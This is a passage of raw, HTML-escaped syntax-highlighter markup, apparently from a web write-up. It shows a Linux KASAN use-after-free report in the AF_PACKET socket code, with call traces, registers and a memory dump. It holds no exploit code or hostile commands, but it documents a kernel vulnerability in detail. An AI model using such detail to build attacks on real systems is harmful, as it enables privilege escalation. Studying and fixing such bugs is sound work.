class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">move_addr_to_kernel<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x60<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x60<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-21\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.769137<\/span><span class=\"crayon-sy\">]<\/span><span 
class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">exit_to_usermode_loop<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x118<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-22\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.771668<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">entry_SYSCALL_64_fastpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x13<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x94<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-23\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.773754<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0033<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0x44d8a7<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-24\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.775130<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00007ffc4e642818<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">EFLAGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">00000217<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ORIG_RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000029<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-25\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.780503<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffffffffffffffda <\/span><span class=\"crayon-v\">RBX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000004002f8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RCX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000044d8a7<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-26\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.785654<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000011<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000003<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000011<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-27\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span 
class=\"crayon-cn\">73.790358<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RBP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00007ffc4e642840<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000000000ca<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00007f4192e6e9d0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-28\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.793544<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R11<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000217<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000040b410<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-29\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.795999<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000040b4a0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R14<\/span><span class=\"crayon-o\">:<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-30\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.798567<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-31\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.799095<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Allocated <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-i\">task<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1360<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-32\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.800300<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">save_stack_trace<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x16<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-33\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.802533<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">save_stack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x46<\/span><span class=\"crayon-o\">\/<\/span><span 
class=\"crayon-cn\">0xd0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-34\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.803959<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kasan_kmalloc<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xad<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xe0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-35\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.805833<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kmem_cache_alloc_trace<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xd7<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x190<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-36\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.808233<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">packet_setsockopt<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1d29<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x25c0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-37\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.810226<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">SyS_setsockopt<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x158<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x240<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-38\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.811957<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">entry_SYSCALL_64_fastpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x13<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x94<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-39\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.814636<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-40\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.815367<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Freed <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-i\">task<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1175<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-41\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.816935<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">save_stack_trace<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x16<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-42\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.821621<\/span><span class=\"crayon-sy\">]<\/span><span 
class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">save_stack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x46<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xd0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-43\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.825576<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kasan_slab_free<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x72<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xc0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-44\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.827477<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kfree<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x91<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x190<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-45\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.828523<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">packet_release<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x700<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xbd0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-46\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.830162<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span 
class=\"crayon-v\">sock_release<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x8d<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1d0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-47\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.831612<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sock_close<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x16<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-48\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.832906<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">__fput<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x276<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x6d0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-49\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.834730<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">____fput<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x15<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-50\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.835998<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">task_work_run<\/span><span class=\"crayon-o\">+<\/span><span 
class=\"crayon-cn\">0x121<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x190<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-51\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.837564<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">exit_to_usermode_loop<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x131<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-52\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.838709<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">syscall_return_slowpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x15c<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1a0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-53\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.840403<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">entry_SYSCALL_64_fastpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x92<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x94<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-54\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.842343<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-55\"><span class=\"crayon-sy\">[<\/span><span 
class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.842765<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">buggy <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-e\">belongs <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-i\">ffff880067d28000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-56\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.842765<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">which <\/span><span class=\"crayon-e\">belongs <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">cache <\/span><span class=\"crayon-v\">kmalloc<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">4096<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-i\">size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4096<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-57\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.845897<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">buggy <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">located<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2160<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-e\">bytes <\/span><span class=\"crayon-e\">inside <\/span><span class=\"crayon-i\">of<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-58\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.845897<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">4096<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-t\">byte<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">region<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">ffff880067d28000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ffff880067d29000<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-59\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.851443<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">buggy <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-e\">belongs <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-60\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.852989<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">ffffea00019f4a00 <\/span><span class=\"crayon-v\">count<\/span><span class=\"crayon-o\">:<\/span><span 
class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mapcount<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mapping<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">index<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">compound_mapcount<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-61\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.861329<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flags<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000008100<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">slab<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-62\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.862992<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">raw<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0100000000008100<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000180070007<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-63\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.866052<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">raw<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dead000000000100 <\/span><span class=\"crayon-e\">dead000000000200 <\/span><span class=\"crayon-i\">ffff88006cc02f00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-64\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.870617<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">page <\/span><span class=\"crayon-e\">dumped <\/span><span class=\"crayon-v\">because<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">kasan<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bad <\/span><span class=\"crayon-e\">access <\/span><span class=\"crayon-i\">detected<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-65\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.872456<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-66\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.872851<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-e\">Memory <\/span><span class=\"crayon-e\">state <\/span><span class=\"crayon-e\">around <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">buggy <\/span><span class=\"crayon-v\">address<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-67\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.874057<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ffff880067d28700<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span 